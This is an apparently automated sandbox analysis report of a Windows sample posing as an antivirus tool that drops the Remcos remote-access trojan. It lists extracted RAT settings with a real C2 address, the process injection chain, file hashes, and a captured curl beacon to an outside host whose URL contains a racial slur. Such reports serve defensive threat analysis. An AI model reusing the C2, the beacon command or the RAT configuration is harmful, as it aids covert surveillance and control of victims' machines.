Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    22-04-2024 11:57

General

  • Target

    och_ex_antivirus.exe

  • Size

    17.0MB

  • MD5

    eb33ab953cc1efc9a57c6c9db447a587

  • SHA1

    e5657e79caa5722ac87a0b933f9a22d4b4844f71

  • SHA256

    042767e0fa4fa7fe964a771a9d743ebb740d4f9a1e59609c704f51958310b1ff

  • SHA512

    69b6ed09d38a85bef70ff52e7833d060163c0b6bddd271d81f801a99513da2985d5d25dcb971b57b00504053b93068e5921142abb13ed05c33e1e1d5c4841c78

  • SSDEEP

    196608:C0bq45mXYPrOLaw1ZiRaKUhi9TQvtzEXPg7V8/TLZ5:/bq4oojOLahUhi9z/PTLr

Malware Config

Extracted

  • Family
    remcos
  • Botnet
    RemoteHost
  • C2
    178.33.57.155:443

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-PM1AI7

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is closed-source remote control and surveillance software.

  • Executes dropped EXE (2 IoCs)
  • Loads dropped DLL (14 IoCs)
  • Checks whether UAC is enabled (1 TTP, 1 IoC)
  • Suspicious use of SetThreadContext (1 IoC)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings (1 TTP, 4 IoCs)
  • Suspicious behavior: EnumeratesProcesses (7 IoCs)
  • Suspicious behavior: MapViewOfSection (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (4 IoCs)
  • Suspicious use of WriteProcessMemory (31 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe
    "C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe"
    1⤵
    • Checks whether UAC is enabled
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2860
    • C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
      C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Modifies Internet Explorer settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2596
      • C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
        C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2748
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\SysWOW64\cmd.exe
          4⤵
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2508
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1644
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2096
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=QGTQZTRE
                7⤵
                  PID:2316
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\chthemyndekf.vbs"
                6⤵
                  PID:1316

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\a4d0d0ec

        Filesize

        5.4MB

        MD5

        47842103e2e4b1f02de9a4dea3b65dcc

        SHA1

        11bb3c3c1ad4f6b4fc7769ecf14b4f9e5ede5dda

        SHA256

        0cb81803e081f6491491f74f857d6e738307ede06bd3e9e39f4b5f44c0bd2548

        SHA512

        18d986698df11ad9032fa0fc90417f0f6b411158c73d93824ec6030908b5d1f5ddbcd4628f7fcab5b8bf04e559ac39b6a85c24449cb126c0b26a9bb24d77b322

      • C:\Users\Admin\AppData\Local\Temp\afc00fbd

        Filesize

        1.2MB

        MD5

        a44564c5624447597ad73d1a4ad63375

        SHA1

        229b2fa4ced130aa45395760b1b16b3bd0363ac7

        SHA256

        e398903e8fdce879747ec96c118306a0e9c1d5aaf41ac79e2c1142b961051bb8

        SHA512

        e0fd05cbc7a17f58358214950d05163b03008d147c68f31c1db9ff055527d82136e023dab745a7b41abe1ddcbb39ff7c66ed6fe4c4539e6a18d8c75de99f3c8a

      • C:\Users\Admin\AppData\Local\Temp\check1.vbs

        Filesize

        146B

        MD5

        85a2ebad40c21ba1da77230265b5351f

        SHA1

        803822e08837ebda5de7dde963e4872ae2fc4c21

        SHA256

        b5c409cbb25690b000d9d36c3b5170c1e61fff3d89bdaeadf0166ae28b0fdff9

        SHA512

        77374eb3d9632c45c25c997380eab1ee338fbe659a24679b3cf28e76d67ffa71e2d2ea326181909d06970dca0e92b5528c1e7f9c866493162fd77170f87ea83a

      • C:\Users\Admin\AppData\Local\Temp\chthemyndekf.vbs

        Filesize

        260B

        MD5

        20194639a471c85332924601e071aec4

        SHA1

        6a69ca7f78b34ca6a3959236237ef62de1cf09a2

        SHA256

        43dddf81fa819e8499eb4a24211a2702ee8a3fc04048d4a8e3b3f4f9420c68e8

        SHA512

        5616837814bf251f1d007cbaf8002aa66b91b199833437ca236507adaa40ece785264da6857445ab8ae958803453af67f631a0ec0cd1c931c7f3e763c24bc079

      • C:\Users\Admin\AppData\Local\Temp\toolsync\MSVCP140.dll

        Filesize

        427KB

        MD5

        71a0aa2d05e9174cefd568347bd9c70f

        SHA1

        cb9247a0fa59e47f72df7d1752424b33a903bbb2

        SHA256

        fdb3d86c512adff90967cb860d02a4682850ab96727f0376e4d4836504c50e47

        SHA512

        6e65520528facaa4058720eb16d6bfdcc7bb36923b7e8e6551f3526709f0fabafab123999e618438e6abe7efed4a1332547cfc988f2b24b0e3d91198b95a911a

      • C:\Users\Admin\AppData\Local\Temp\toolsync\VCRUNTIME140.dll

        Filesize

        81KB

        MD5

        16b26bc43943531d7d7e379632ed4e63

        SHA1

        565287de39649e59e653a3612478c2186096d70a

        SHA256

        346f72c9a7584c2ab6ce65cd38a616c77ebddc0bbab2274c4e89dd5e62237517

        SHA512

        b5b7b4b8c5ab4276a34956e43f586272b1803ec3609253fee1bcc0a549aed7ba11d47404b023f7b67af701726bab95cca55738e7bd5bca272eca5ac71bb418cc

      • C:\Users\Admin\AppData\Local\Temp\toolsync\WCLDll.dll

        Filesize

        590KB

        MD5

        b3e030ab715a02f8864a79f552a247b7

        SHA1

        4b1c18370b6e8a69c5f8b3ff543375f74e6e58fa

        SHA256

        2a844750786ab6798e9a26de7f080802f709c0f12ba7a31545f0c2e449ac0955

        SHA512

        cd030a0a9e6109b27b5f5d3299024c222287487bc9fac1edd92b760425a939bc307b1d15801fec7e274bd8377b8dd9c7883674d1488af5f062a102275a373eda

      • C:\Users\Admin\AppData\Local\Temp\toolsync\audiovisual.psd

        Filesize

        1.0MB

        MD5

        a0a180d2677f494049d7a55c888fed93

        SHA1

        d09358fddc9a67ae55b5ba4a34fba04357b528db

        SHA256

        5e086150a36e2e98c91464a210499648832172f883c1bd515c4a0661a10866bd

        SHA512

        1f152fe593a25c05973b351206a40953bd801b8c77f04c2f20c966869fe72d2b6c71ed5bd77e64942153f0dca590e2655340a93d8b7eb29d558152f1a7b6fde1

      • C:\Users\Admin\AppData\Local\Temp\toolsync\cyclopedia.html

        Filesize

        28KB

        MD5

        db3f3969e8a2f913fe3643d8465171b1

        SHA1

        736095ea1e02547a6df2586fffdbf31bb7d23656

        SHA256

        c207be09bf97912ed1271a4186bb626edc530c76f3e5edcac883a98946c41043

        SHA512

        0a2948bad6e3f6338fb44a727e0de4d268db6a6e5933331b54b12877da0f3b75a796cb32e86cd251b4afc4ca9df5aaccb04db1153b31fc77318ce8909b18d81b

      • C:\Users\Admin\AppData\Local\Temp\toolsync\ptMgr.dll

        Filesize

        2.5MB

        MD5

        2087eb2d3fb639933ebe0a0614fd5218

        SHA1

        c1a1b75c8e76e000b7045092bd11100904a72840

        SHA256

        725f50650cb9490027b633a1ff0ae166cb6fc42037dbe72d9a09dd65be323a1f

        SHA512

        3390536ed543529d01ed7d1616d36d6fde67d68bf6641f901ac5c081ede043943dacd3a7a0bf1729945be800d4ccda00c07511e1c23c7c33d9864be50645502e

      • C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe

        Filesize

        202KB

        MD5

        64179e64675e822559cac6652298bdfc

        SHA1

        cceed3b2441146762512918af7bf7f89fb055583

        SHA256

        c26db97858c427d92e393396f7cb7f9e7ed8f9ce616adcc123d0ec6b055b99c9

        SHA512

        ef740b35ea5190f8ee47776af1f15ebdd54d39c84da5665e64f67ae6dd0f4b181e955e9a35319a5d0bd764972562e8f2bc44dbdf83c3bedf05674eae902e7280

      • C:\Users\Admin\AppData\Local\Temp\toolsync\ptusredt.dll

        Filesize

        165KB

        MD5

        3c3e960d59cb413791fee1e944b6df72

        SHA1

        4aa6c90d81692642ca8266bf0d8e249ff3e3ad54

        SHA256

        88378c228d7827974fe6ec827837af7571290e129082e7070d4bff7a42f4ba67

        SHA512

        85b471aa2a066c6a779384ed102b895af108af51cd718bb834cda107f71bf5e6fcd8ecc77e9ea4fd7fd3ddbc10b1f57870a9bafcbbfa1be8e2ba224651d77aac

      • C:\Users\Admin\AppData\Local\Temp\toolsync\wbxtrace.dll

        Filesize

        103KB

        MD5

        c2b06a78b6c07a1371b6aed1dbf4fc37

        SHA1

        b8847693e7cd3637b1b400e71430cdf629de2e64

        SHA256

        9e2b2d67d0e70651a64a3febee9f2698d8a939633587fe973a30758368cffc04

        SHA512

        219965e4b3e9f237f75d9306bdf5a08c872cded973009da64c58221e1bbdbfda35e4861c4c0b6687fca7c67ef496b307695af5e1270f8d5c3cf71a3fc02c6411

      • memory/1644-135-0x0000000077620000-0x00000000777C9000-memory.dmp

        Filesize

        1.7MB

      • memory/1644-136-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

      • memory/1644-152-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

      • memory/1644-148-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

      • memory/1644-147-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

      • memory/1644-146-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

      • memory/1644-145-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

      • memory/1644-144-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

      • memory/1644-138-0x0000000000C50000-0x0000000000ED1000-memory.dmp

        Filesize

        2.5MB

      • memory/2508-84-0x0000000077620000-0x00000000777C9000-memory.dmp

        Filesize

        1.7MB

      • memory/2508-82-0x0000000074510000-0x0000000074684000-memory.dmp

        Filesize

        1.5MB

      • memory/2508-131-0x0000000074510000-0x0000000074684000-memory.dmp

        Filesize

        1.5MB

      • memory/2508-132-0x0000000074510000-0x0000000074684000-memory.dmp

        Filesize

        1.5MB

      • memory/2508-134-0x0000000074510000-0x0000000074684000-memory.dmp

        Filesize

        1.5MB

      • memory/2596-46-0x0000000077620000-0x00000000777C9000-memory.dmp

        Filesize

        1.7MB

      • memory/2596-45-0x00000000741E0000-0x0000000074354000-memory.dmp

        Filesize

        1.5MB

      • memory/2596-41-0x00000000002F0000-0x00000000002F1000-memory.dmp

        Filesize

        4KB

      • memory/2748-76-0x0000000074510000-0x0000000074684000-memory.dmp

        Filesize

        1.5MB

      • memory/2748-78-0x0000000074510000-0x0000000074684000-memory.dmp

        Filesize

        1.5MB

      • memory/2748-77-0x0000000077620000-0x00000000777C9000-memory.dmp

        Filesize

        1.7MB

      • memory/2748-80-0x0000000074510000-0x0000000074684000-memory.dmp

        Filesize

        1.5MB

      • memory/2748-72-0x0000000000120000-0x0000000000121000-memory.dmp

        Filesize

        4KB

      • memory/2860-79-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

        Filesize

        1.3MB

      • memory/2860-8-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

        Filesize

        1.3MB

      • memory/2860-0-0x0000000100000000-0x0000000101123000-memory.dmp

        Filesize

        17.1MB

      • memory/2860-15-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

        Filesize

        1.3MB

      • memory/2860-30-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

        Filesize

        1.3MB

      • memory/2860-6-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

        Filesize

        1.3MB